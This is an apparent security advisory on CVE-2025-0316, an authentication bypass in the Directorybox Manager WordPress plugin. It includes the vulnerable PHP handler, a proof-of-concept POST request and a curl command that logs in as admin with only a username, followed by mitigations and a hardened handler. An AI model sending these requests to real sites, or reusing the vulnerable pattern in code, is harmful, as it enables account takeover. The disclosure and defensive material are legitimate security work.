CVE-2025-0316 is a critical vulnerability affecting the popular Directorybox Manager plugin for WordPress. Versions up to and including 2.5 are impacted. The flaw lets anyone with knowledge of a username – even an unauthenticated attacker – log in as that user (including admins!) due to faulty authentication logic in the wp_dp_enquiry_agent_contact_form_submit_callback function.

If your site uses this plugin, update or disable it immediately.

What is Directorybox Manager?

Directorybox Manager is a directory plugin used on thousands of WordPress websites for managing listings and user submissions. It provides custom post types, forms, and user account functionality.

Where is the Problem?

The authentication bypass occurs in the AJAX handler wp_dp_enquiry_agent_contact_form_submit_callback. This function is used by the plugin's contact forms and contains improper checks for logged-in users.

Vulnerable Code Example

// Inside wp_dp_enquiry_agent_contact_form_submit_callback:
// (no nonce check precedes this, so any POST to admin-ajax.php reaches it)

$user = get_user_by('login', sanitize_text_field($_POST['username']));
if ($user) {
    // No password check! The attacker-supplied username alone selects the account.
    wp_set_current_user($user->ID);
    wp_set_auth_cookie($user->ID);
    // ...proceed as logged-in user
}

How to Exploit (Proof of Concept)

> Disclaimer:
> This is for educational purposes only. Do not use on live systems you do not own.

Steps an attacker can take

1. Find a username (commonly "admin", or via /?author=1 or public listings).

2. Send a POST request to WordPress's AJAX handler as an unauthenticated user:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

action=wp_dp_enquiry_agent_contact_form_submit_callback&username=admin

After this request, you'll be logged in as "admin": the site sets a valid login cookie for that account.

Full Exploit in cURL

curl -i -X POST https://victim.com/wp-admin/admin-ajax.php \
     -d "action=wp_dp_enquiry_agent_contact_form_submit_callback&username=admin"

- You can then access /wp-admin/ as an administrator.

References:

- NVD CVE-2025-0316 entry
- WPScan Advisory
- Plugin's WordPress page

Mitigation

- Disable the plugin until a fixed version is released.
- Restrict access to /wp-admin/ via .htaccess or firewall.
- Use plugins like Wordfence or Sucuri to temporarily block suspicious AJAX requests.

Final Thoughts

CVE-2025-0316 is extremely dangerous, especially for high-profile or business websites.

Regularly check for updates.

For admins and developers:
Always validate both username _and_ password, and require a valid nonce for all AJAX handlers.
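The following is an added example of what a hardened version of the handler shown in "Vulnerable Code Example" could look like, applying the advice above (nonce check, username and password verification). It is not the plugin's code or its patch; the hook registration, the nonce action name 'wp_dp_enquiry_form' and the request field names 'nonce', 'username' and 'password' are assumptions for illustration.

```php
<?php
// Added example, not the plugin's own code. The handler name suffix "_fixed",
// the nonce action 'wp_dp_enquiry_form' and the field names are assumptions.

add_action( 'wp_ajax_wp_dp_enquiry_agent_contact_form_submit_callback', 'wp_dp_enquiry_agent_contact_form_submit_callback_fixed' );
add_action( 'wp_ajax_nopriv_wp_dp_enquiry_agent_contact_form_submit_callback', 'wp_dp_enquiry_agent_contact_form_submit_callback_fixed' );

function wp_dp_enquiry_agent_contact_form_submit_callback_fixed() {
    // 1. Require a valid nonce so only the plugin's own form can reach this code.
    //    check_ajax_referer() terminates the request on failure.
    check_ajax_referer( 'wp_dp_enquiry_form', 'nonce' );

    // 2. A visitor who is already logged in keeps their own session. Never switch
    //    identity based on a username supplied in the request.
    if ( is_user_logged_in() ) {
        wp_send_json_success( array( 'user_id' => get_current_user_id() ) );
    }

    // 3. Anonymous visitors must present BOTH a username and a password.
    $username = isset( $_POST['username'] ) ? sanitize_user( wp_unslash( $_POST['username'] ) ) : '';
    $password = isset( $_POST['password'] ) ? (string) wp_unslash( $_POST['password'] ) : '';

    if ( '' === $username || '' === $password ) {
        wp_send_json_error( array( 'message' => 'Username and password are required.' ), 400 );
    }

    // wp_authenticate() runs the normal WordPress login checks (password hash
    // verification plus any login-limiting or 2FA hooks) and returns WP_Error
    // on failure, so an unverified username alone can no longer select an account.
    $user = wp_authenticate( $username, $password );
    if ( is_wp_error( $user ) ) {
        // Generic message: do not reveal whether the username exists.
        wp_send_json_error( array( 'message' => 'Invalid credentials.' ), 401 );
    }

    // Only after successful authentication is it safe to establish a session.
    wp_set_current_user( $user->ID );
    wp_set_auth_cookie( $user->ID, false );

    wp_send_json_success( array( 'user_id' => $user->ID ) );
}
```

A contact-form handler that does not actually need to log anyone in should drop steps 2 and 3 entirely and simply record get_current_user_id() (0 for guests), which removes the authentication surface altogether.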

Useful References

- CVE-2025-0316 NVD Record
- Directorybox Manager Plugin
- How to secure your WordPress site

Timeline

Published on: 02/08/2025 22:15:28 UTC